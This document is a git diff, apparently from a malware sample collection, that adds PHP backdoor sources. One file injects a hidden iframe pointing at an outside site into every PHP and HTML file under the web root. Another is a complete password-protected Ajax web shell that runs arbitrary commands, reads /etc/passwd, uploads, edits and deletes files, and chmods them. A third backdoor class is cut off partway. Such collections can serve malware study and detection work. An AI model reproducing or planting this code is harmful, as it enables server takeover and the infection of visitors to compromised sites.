Normal file
75
PHP/Backdoor.PHP.Agent.al
Normal file
@ -0,0 +1,75 @@
|
|||||||
|
<?
|
||||||
|
$dir = @getcwd();
|
||||||
|
echo "KaioWas";
|
||||||
|
$cmd="id";
|
||||||
|
$eseguicmd=ex($cmd);
|
||||||
|
echo $eseguicmd;
|
||||||
|
function ex($cfe){
|
||||||
|
$res = '';
|
||||||
|
if (!empty($cfe)){
|
||||||
|
if(function_exists('exec')){
|
||||||
|
@exec($cfe,$res);
|
||||||
|
$res = join("\n",$res);
|
||||||
|
}
|
||||||
|
elseif(function_exists('shell_exec')){
|
||||||
|
$res = @shell_exec($cfe);
|
||||||
|
}
|
||||||
|
elseif(function_exists('system')){
|
||||||
|
@ob_start();
|
||||||
|
@system($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(function_exists('passthru')){
|
||||||
|
@ob_start();
|
||||||
|
@passthru($cfe);
|
||||||
|
$res = @ob_get_contents();
|
||||||
|
@ob_end_clean();
|
||||||
|
}
|
||||||
|
elseif(@is_resource($f = @popen($cfe,"r"))){
|
||||||
|
$res = "";
|
||||||
|
while(!@feof($f)) { $res .= @fread($f,1024); }
|
||||||
|
@pclose($f);
|
||||||
|
}}
|
||||||
|
return $res;
|
||||||
|
}
|
||||||
|
function view_size($size)
|
||||||
|
{
|
||||||
|
if (!is_numeric($size)) {return FALSE;}
|
||||||
|
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
|
||||||
|
|
||||||
|
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
|
||||||
|
|
||||||
|
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
|
||||||
|
|
||||||
|
else {$size = $size . " B";}
|
||||||
|
|
||||||
|
return $size;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if(!isset($_SERVER['DOCUMENT_ROOT']))
|
||||||
|
{
|
||||||
|
$n = $_SERVER['SCRIPT_NAME'];
|
||||||
|
$f = ereg_replace('\\\\', '/',$_SERVER["PATH_TRANSLATED"]);
|
||||||
|
$f = str_replace('//','/',$f);
|
||||||
|
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
|
||||||
|
}
|
||||||
|
$codigo = "<IFRAME src=\"http://usuarios.arnet.com.ar/alvarezluque/morgan.html\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>\n";
|
||||||
|
$directorio = $_SERVER['DOCUMENT_ROOT'];
|
||||||
|
|
||||||
|
foreach (glob("$directorio/*.php") as $archivo) {
|
||||||
|
$fp=fopen($archivo,"a+");
|
||||||
|
fputs($fp,$codigo);
|
||||||
|
}
|
||||||
|
foreach (glob("$directorio/*.htm") as $archivh) {
|
||||||
|
$fp=fopen($archivh,"a+");
|
||||||
|
fputs($fp,$codigo);
|
||||||
|
}
|
||||||
|
foreach (glob("$directorio/*.html") as $archivl) {
|
||||||
|
$fp=fopen($archivl,"a+");
|
||||||
|
fputs($fp,$codigo);
|
||||||
|
}
|
||||||
|
?>
|
8342
PHP/Backdoor.PHP.Agent.am
Normal file
8342
PHP/Backdoor.PHP.Agent.am
Normal file
File diff suppressed because one or more lines are too long
1766
PHP/Backdoor.PHP.Agent.an
Normal file
1766
PHP/Backdoor.PHP.Agent.an
Normal file
File diff suppressed because it is too large
Load Diff
646
PHP/Backdoor.PHP.Agent.ao
Normal file
646
PHP/Backdoor.PHP.Agent.ao
Normal file
@ -0,0 +1,646 @@
|
|||||||
|
<?php
|
||||||
|
session_start();
|
||||||
|
|
||||||
|
error_reporting(0);
|
||||||
|
|
||||||
|
$password = "password"; //Change this to your password ;)
|
||||||
|
|
||||||
|
$version = "0.7B";
|
||||||
|
|
||||||
|
$functions = array('Clear Screen' => 'ClearScreen()',
|
||||||
|
'Clear History' => 'ClearHistory()',
|
||||||
|
'Can I function?' => "runcommand('canirun','GET')",
|
||||||
|
'Get server info' => "runcommand('showinfo','GET')",
|
||||||
|
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
|
||||||
|
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
|
||||||
|
'Running processes' => "runcommand('ps -aux','GET')",
|
||||||
|
'Readme' => "runcommand('shellhelp','GET')"
|
||||||
|
|
||||||
|
);
|
||||||
|
$thisfile = basename(__FILE__);
|
||||||
|
|
||||||
|
$style = '<style type="text/css">
|
||||||
|
.cmdthing {
|
||||||
|
border-top-width: 0px;
|
||||||
|
font-weight: bold;
|
||||||
|
border-left-width: 0px;
|
||||||
|
font-size: 10px;
|
||||||
|
border-left-color: #000000;
|
||||||
|
background: #000000;
|
||||||
|
border-bottom-width: 0px;
|
||||||
|
border-bottom-color: #FFFFFF;
|
||||||
|
color: #FFFFFF;
|
||||||
|
border-top-color: #008000;
|
||||||
|
font-family: verdana;
|
||||||
|
border-right-width: 0px;
|
||||||
|
border-right-color: #000000;
|
||||||
|
}
|
||||||
|
input,textarea {
|
||||||
|
border-top-width: 1px;
|
||||||
|
font-weight: bold;
|
||||||
|
border-left-width: 1px;
|
||||||
|
font-size: 10px;
|
||||||
|
border-left-color: #FFFFFF;
|
||||||
|
background: #000000;
|
||||||
|
border-bottom-width: 1px;
|
||||||
|
border-bottom-color: #FFFFFF;
|
||||||
|
color: #FFFFFF;
|
||||||
|
border-top-color: #FFFFFF;
|
||||||
|
font-family: verdana;
|
||||||
|
border-right-width: 1px;
|
||||||
|
border-right-color: #FFFFFF;
|
||||||
|
}
|
||||||
|
A:hover {
|
||||||
|
text-decoration: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
table,td,div {
|
||||||
|
border-collapse: collapse;
|
||||||
|
border: 1px solid #FFFFFF;
|
||||||
|
}
|
||||||
|
body {
|
||||||
|
color: #FFFFFF;
|
||||||
|
font-family: verdana;
|
||||||
|
}
|
||||||
|
</style>';
|
||||||
|
$sess = __FILE__.$password;
|
||||||
|
if(isset($_POST['p4ssw0rD']))
|
||||||
|
{
|
||||||
|
if($_POST['p4ssw0rD'] == $password)
|
||||||
|
{
|
||||||
|
$_SESSION[$sess] = $_POST['p4ssw0rD'];
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
die("Wrong password");
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
if($_SESSION[$sess] == $password)
|
||||||
|
{
|
||||||
|
if(isset($_SESSION['workdir']))
|
||||||
|
{
|
||||||
|
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
|
||||||
|
{
|
||||||
|
chdir($_SESSION['workdir']);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if(isset($_FILES['uploadedfile']['name']))
|
||||||
|
{
|
||||||
|
$target_path = "./";
|
||||||
|
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
|
||||||
|
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if(isset($_GET['runcmd']))
|
||||||
|
{
|
||||||
|
|
||||||
|
$cmd = $_GET['runcmd'];
|
||||||
|
|
||||||
|
print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
|
||||||
|
|
||||||
|
if($cmd == "")
|
||||||
|
{
|
||||||
|
print "Empty Command..type \"shellhelp\" for some ehh...help";
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif($cmd == "upload")
|
||||||
|
{
|
||||||
|
print '<br>Uploading to: '.realpath(".");
|
||||||
|
if(is_writable(realpath(".")))
|
||||||
|
{
|
||||||
|
print "<br><b>I can write to this directory</b>";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
|
||||||
|
{
|
||||||
|
if(file_exists($file[1]) && is_dir($file[1]))
|
||||||
|
{
|
||||||
|
chdir($file[1]);
|
||||||
|
$_SESSION['workdir'] = $file[1];
|
||||||
|
print "Current directory changed to ".$file[1];
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Directory not found";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif(strtolower($cmd) == "shellhelp")
|
||||||
|
{
|
||||||
|
print '<b><font size=7>Ajax/PHP Command Shell</b></font>
|
||||||
|
© By Ironfist
|
||||||
|
|
||||||
|
The shell can be used by anyone to command any server, the main purpose was
|
||||||
|
to create a shell that feels as dynamic as possible, is expandable and easy
|
||||||
|
to understand.
|
||||||
|
|
||||||
|
If one of the command execution functions work, the shell will function fine.
|
||||||
|
Try the "canirun" command to check this.
|
||||||
|
|
||||||
|
Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
|
||||||
|
not used to these commands, google a little.
|
||||||
|
|
||||||
|
<b>Custom Functions</b>
|
||||||
|
If you want to add your own custom command in the Quick Commands list, check
|
||||||
|
out the code. The $function array contains \'func name\' => \'javascript function\'.
|
||||||
|
Take a look at the built-in functions for examples.
|
||||||
|
|
||||||
|
I know this readme isn\'t providing too much information, but hell, does this shell
|
||||||
|
even require one :P
|
||||||
|
|
||||||
|
- Iron
|
||||||
|
';
|
||||||
|
|
||||||
|
}
|
||||||
|
elseif(ereg("editfile (.*)",$cmd,$file))
|
||||||
|
{
|
||||||
|
if(file_exists($file[1]) && !is_dir($file[1]))
|
||||||
|
{
|
||||||
|
print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
|
||||||
|
$contents = file($file[1]);
|
||||||
|
foreach($contents as $line)
|
||||||
|
{
|
||||||
|
print htmlspecialchars($line);
|
||||||
|
}
|
||||||
|
print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "File not found.";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif(ereg("deletefile (.*)",$cmd,$file))
|
||||||
|
{
|
||||||
|
if(is_dir($file[1]))
|
||||||
|
{
|
||||||
|
if(rmdir($file[1]))
|
||||||
|
{
|
||||||
|
print "Directory succesfully deleted.";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Couldn't delete directory!";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(unlink($file[1]))
|
||||||
|
{
|
||||||
|
print "File succesfully deleted.";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Couldn't delete file!";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif(strtolower($cmd) == "canirun")
|
||||||
|
{
|
||||||
|
print "If any of these functions is Enabled, the shell will function like it should.<br>";
|
||||||
|
if(function_exists(passthru))
|
||||||
|
{
|
||||||
|
print "Passthru: <b><font color=green>Enabled</b></font><br>";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Passthru: <b><font color=red>Disabled</b></font><br>";
|
||||||
|
}
|
||||||
|
|
||||||
|
if(function_exists(exec))
|
||||||
|
{
|
||||||
|
print "Exec: <b><font color=green>Enabled</b></font><br>";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Exec: <b><font color=red>Disabled</b></font><br>";
|
||||||
|
}
|
||||||
|
|
||||||
|
if(function_exists(system))
|
||||||
|
{
|
||||||
|
print "System: <b><font color=green>Enabled</b></font><br>";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "System: <b><font color=red>Disabled</b></font><br>";
|
||||||
|
}
|
||||||
|
if(function_exists(shell_exec))
|
||||||
|
{
|
||||||
|
print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
|
||||||
|
}
|
||||||
|
print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
|
||||||
|
if( ini_get('safe_mode') ){
|
||||||
|
print "Safe Mode: <b><font color=red>Enabled</b></font>";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Safe Mode: <b><font color=green>Disabled</b></font>";
|
||||||
|
}
|
||||||
|
print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
|
||||||
|
if( ini_get('open_basedir') ){
|
||||||
|
print "Open_basedir: <b><font color=red>Enabled</b></font>";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Open_basedir: <b><font color=green>Disabled</b></font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
//About the shell
|
||||||
|
elseif(ereg("listdir (.*)",$cmd,$directory))
|
||||||
|
{
|
||||||
|
|
||||||
|
if(!file_exists($directory[1]))
|
||||||
|
{
|
||||||
|
die("Directory not found");
|
||||||
|
}
|
||||||
|
//Some variables
|
||||||
|
chdir($directory[1]);
|
||||||
|
$i = 0; $f = 0;
|
||||||
|
$dirs = "";
|
||||||
|
$filez = "";
|
||||||
|
|
||||||
|
if(!ereg("/$",$directory[1])) //Does it end with a slash?
|
||||||
|
{
|
||||||
|
$directory[1] .= "/"; //If not, add one
|
||||||
|
}
|
||||||
|
print "Listing directory: ".$directory[1]."<br>";
|
||||||
|
print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
|
||||||
|
|
||||||
|
if ($handle = opendir($directory[1])) {
|
||||||
|
while (false !== ($file = readdir($handle))) {
|
||||||
|
if(is_dir($file))
|
||||||
|
{
|
||||||
|
$dirs[$i] = $file;
|
||||||
|
$i++;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$filez[$f] = $file;
|
||||||
|
$f++;
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
print "<td>";
|
||||||
|
|
||||||
|
foreach($dirs as $directory)
|
||||||
|
{
|
||||||
|
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
|
||||||
|
}
|
||||||
|
|
||||||
|
print "</td><td>";
|
||||||
|
|
||||||
|
foreach($filez as $file)
|
||||||
|
{
|
||||||
|
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
|
||||||
|
}
|
||||||
|
|
||||||
|
print "</td></table>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif(strtolower($cmd) == "about")
|
||||||
|
{
|
||||||
|
print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
|
||||||
|
}
|
||||||
|
//Show info
|
||||||
|
elseif(strtolower($cmd) == "showinfo")
|
||||||
|
{
|
||||||
|
if(function_exists(disk_free_space))
|
||||||
|
{
|
||||||
|
$free = disk_free_space("/") / 1000000;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$free = "N/A";
|
||||||
|
}
|
||||||
|
if(function_exists(disk_total_space))
|
||||||
|
{
|
||||||
|
$total = trim(disk_total_space("/") / 1000000);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$total = "N/A";
|
||||||
|
}
|
||||||
|
$path = realpath (".");
|
||||||
|
|
||||||
|
print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
|
||||||
|
|
||||||
|
if(function_exists(passthru))
|
||||||
|
{
|
||||||
|
passthru("uname -a");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Passthru is disabled :(";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
//Read /etc/passwd
|
||||||
|
elseif(strtolower($cmd) == "etcpasswdfile")
|
||||||
|
{
|
||||||
|
|
||||||
|
$pw = file('/etc/passwd/');
|
||||||
|
foreach($pw as $line)
|
||||||
|
{
|
||||||
|
print $line;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
//Execute any other command
|
||||||
|
else
|
||||||
|
{
|
||||||
|
|
||||||
|
if(function_exists(passthru))
|
||||||
|
{
|
||||||
|
passthru($cmd);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(function_exists(exec))
|
||||||
|
{
|
||||||
|
exec("ls -la",$result);
|
||||||
|
foreach($result as $output)
|
||||||
|
{
|
||||||
|
print $output."<br>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(function_exists(system))
|
||||||
|
{
|
||||||
|
system($cmd);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(function_exists(shell_exec))
|
||||||
|
{
|
||||||
|
print shell_exec($cmd);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
print "Sorry, none of the command functions works.";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
|
||||||
|
{
|
||||||
|
$file = $_POST['filetosave'];
|
||||||
|
if(!is_writable($file))
|
||||||
|
{
|
||||||
|
if(!chmod($file, 0777))
|
||||||
|
{
|
||||||
|
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$fh = fopen($file, 'w');
|
||||||
|
$dt = $_POST['filecontent'];
|
||||||
|
fwrite($fh, $dt);
|
||||||
|
fclose($fh);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
?>
|
||||||
|
<html>
|
||||||
|
<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
|
||||||
|
<head>
|
||||||
|
<?php print $style; ?>
|
||||||
|
<SCRIPT TYPE="text/javascript">
|
||||||
|
function sf(){document.cmdform.command.focus();}
|
||||||
|
var outputcmd = "";
|
||||||
|
var cmdhistory = "";
|
||||||
|
function ClearScreen()
|
||||||
|
{
|
||||||
|
outputcmd = "";
|
||||||
|
document.getElementById('output').innerHTML = outputcmd;
|
||||||
|
}
|
||||||
|
|
||||||
|
function ClearHistory()
|
||||||
|
{
|
||||||
|
cmdhistory = "";
|
||||||
|
document.getElementById('history').innerHTML = cmdhistory;
|
||||||
|
}
|
||||||
|
|
||||||
|
function deletefile(file)
|
||||||
|
{
|
||||||
|
deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
|
||||||
|
if(deleteit)
|
||||||
|
{
|
||||||
|
runcommand('deletefile ' + file,'GET');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
var http_request = false;
|
||||||
|
function makePOSTRequest(url, parameters) {
|
||||||
|
http_request = false;
|
||||||
|
if (window.XMLHttpRequest) {
|
||||||
|
http_request = new XMLHttpRequest();
|
||||||
|
if (http_request.overrideMimeType) {
|
||||||
|
http_request.overrideMimeType('text/html');
|
||||||
|
}
|
||||||
|
} else if (window.ActiveXObject) {
|
||||||
|
try {
|
||||||
|
http_request = new ActiveXObject("Msxml2.XMLHTTP");
|
||||||
|
} catch (e) {
|
||||||
|
try {
|
||||||
|
http_request = new ActiveXObject("Microsoft.XMLHTTP");
|
||||||
|
} catch (e) {}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if (!http_request) {
|
||||||
|
alert('Cannot create XMLHTTP instance');
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
http_request.open('POST', url, true);
|
||||||
|
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
|
||||||
|
http_request.setRequestHeader("Content-length", parameters.length);
|
||||||
|
http_request.setRequestHeader("Connection", "close");
|
||||||
|
http_request.send(parameters);
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function SaveFile()
|
||||||
|
{
|
||||||
|
var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
|
||||||
|
"&filecontent=" + encodeURI( document.getElementById("area1").value );
|
||||||
|
makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
|
||||||
|
document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
|
||||||
|
}
|
||||||
|
|
||||||
|
function runcommand(urltoopen,action,contenttosend){
|
||||||
|
cmdhistory = "<br> <i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
|
||||||
|
document.getElementById('history').innerHTML = cmdhistory;
|
||||||
|
if(urltoopen == "clear")
|
||||||
|
{
|
||||||
|
ClearScreen();
|
||||||
|
}
|
||||||
|
var ajaxRequest;
|
||||||
|
try{
|
||||||
|
ajaxRequest = new XMLHttpRequest();
|
||||||
|
} catch (e){
|
||||||
|
try{
|
||||||
|
ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
|
||||||
|
} catch (e) {
|
||||||
|
try{
|
||||||
|
ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
|
||||||
|
} catch (e){
|
||||||
|
alert("Wicked error, nothing we can do about it...");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
ajaxRequest.onreadystatechange = function(){
|
||||||
|
if(ajaxRequest.readyState == 4){
|
||||||
|
outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
|
||||||
|
document.getElementById('output').innerHTML = outputcmd;
|
||||||
|
var objDiv = document.getElementById("output");
|
||||||
|
objDiv.scrollTop = objDiv.scrollHeight;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
ajaxRequest.open(action, "?runcmd="+urltoopen , true);
|
||||||
|
if(action == "GET")
|
||||||
|
{
|
||||||
|
ajaxRequest.send(null);
|
||||||
|
}
|
||||||
|
document.cmdform.command.value='';
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
function set_tab_html(newhtml)
|
||||||
|
{
|
||||||
|
document.getElementById('commandtab').innerHTML = newhtml;
|
||||||
|
}
|
||||||
|
|
||||||
|
function set_tab(newtab)
|
||||||
|
{
|
||||||
|
if(newtab == "cmd")
|
||||||
|
{
|
||||||
|
newhtml = ' <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
|
||||||
|
}
|
||||||
|
else if(newtab == "upload")
|
||||||
|
{
|
||||||
|
runcommand('upload','GET');
|
||||||
|
newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
|
||||||
|
}
|
||||||
|
else if(newtab == "workingdir")
|
||||||
|
{
|
||||||
|
<?php
|
||||||
|
$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
|
||||||
|
$pathparts = explode("/",realpath ("."));
|
||||||
|
foreach($pathparts as $folder)
|
||||||
|
{
|
||||||
|
$folders .= $folder."/";
|
||||||
|
}
|
||||||
|
$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
|
||||||
|
|
||||||
|
?>
|
||||||
|
newhtml = '<?php print $folders; ?>';
|
||||||
|
}
|
||||||
|
else if(newtab == "filebrowser")
|
||||||
|
{
|
||||||
|
newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
|
||||||
|
runcommand('listdir .','GET');
|
||||||
|
}
|
||||||
|
else if(newtab == "createfile")
|
||||||
|
{
|
||||||
|
newhtml = '<b>File Editor, under construction.</b>';
|
||||||
|
document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
|
||||||
|
|
||||||
|
}
|
||||||
|
document.getElementById('commandtab').innerHTML = newhtml;
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
|
||||||
|
<table border=1 width=100% height=100%>
|
||||||
|
<td width=15% valign=top>
|
||||||
|
|
||||||
|
<form name="extras"><br>
|
||||||
|
<center><b>Quick Commands</b><br>
|
||||||
|
|
||||||
|
<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
|
||||||
|
<?php
|
||||||
|
foreach($functions as $name => $execute)
|
||||||
|
{
|
||||||
|
print ' <input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
</center>
|
||||||
|
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
<center><b>Command history</b><br></center>
|
||||||
|
<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
|
||||||
|
<br>
|
||||||
|
<center><b>About</b><br></center>
|
||||||
|
<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
|
||||||
|
<br>
|
||||||
|
<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
|
||||||
|
<br>
|
||||||
|
Version <?php print $version; ?>
|
||||||
|
|
||||||
|
<br>
|
||||||
|
<br>
|
||||||
|
|
||||||
|
<br>Thanks to everyone @
|
||||||
|
<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
|
||||||
|
<br>
|
||||||
|
<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
|
||||||
|
<br>
|
||||||
|
and special greetings to everyone in rootshell
|
||||||
|
</div>
|
||||||
|
|
||||||
|
</td>
|
||||||
|
<td width=70%>
|
||||||
|
<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
|
||||||
|
<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
|
||||||
|
<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
|
||||||
|
<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
|
||||||
|
<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
|
||||||
|
<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
|
||||||
|
|
||||||
|
</font></td>
|
||||||
|
<tr>
|
||||||
|
<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
|
||||||
|
|
||||||
|
<tr>
|
||||||
|
<td height=1% width=100% valign=top>
|
||||||
|
<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
|
||||||
|
<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
|
||||||
|
<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
|
||||||
|
</form>
|
||||||
|
</div>
|
||||||
|
</td>
|
||||||
|
</table>
|
||||||
|
</td>
|
||||||
|
</table>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
<?php
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
print "<center><table border=0 height=100%>
|
||||||
|
<td valign=middle>
|
||||||
|
<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
|
||||||
|
</form>";
|
||||||
|
}
|
||||||
|
?>
|
181
PHP/Backdoor.PHP.Agent.ap
Normal file
181
PHP/Backdoor.PHP.Agent.ap
Normal file
@ -0,0 +1,181 @@
|
|||||||
|
<?
|
||||||
|
/*
|
||||||
|
Backdoor php v0.1
|
||||||
|
Coded By Charlichaplin
|
||||||
|
charlichaplin@gmail.com
|
||||||
|
Join me: irc.fr.worldnet.net #s-c
|
||||||
|
Greetz: My dog :)
|
||||||
|
*/
|
||||||
|
|
||||||
|
class backdoor {
|
||||||
|
var $pwd;
|
||||||
|
var $rep;
|
||||||
|
var $list = array();
|
||||||
|
var $file;
|
||||||
|
var $edit;
|
||||||
|
var $fichier;
|
||||||
|
var $del;
|
||||||
|
var $shell;
|
||||||
|
var $proxy;
|
||||||
|
|
||||||
|
function dir() {
|
||||||
|
if(!empty($this->rep)) {
|
||||||
|
$dir = opendir($this->rep);
|
||||||
|
} else {
|
||||||
|
$dir = opendir($this->pwd);
|
||||||
|
}
|
||||||
|
while($f = readdir($dir)) {
|
||||||
|
if ($f !="." && $f != "..") {
|
||||||
|
$this->list[] = $f;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function view() {
|
||||||
|
|
||||||
|
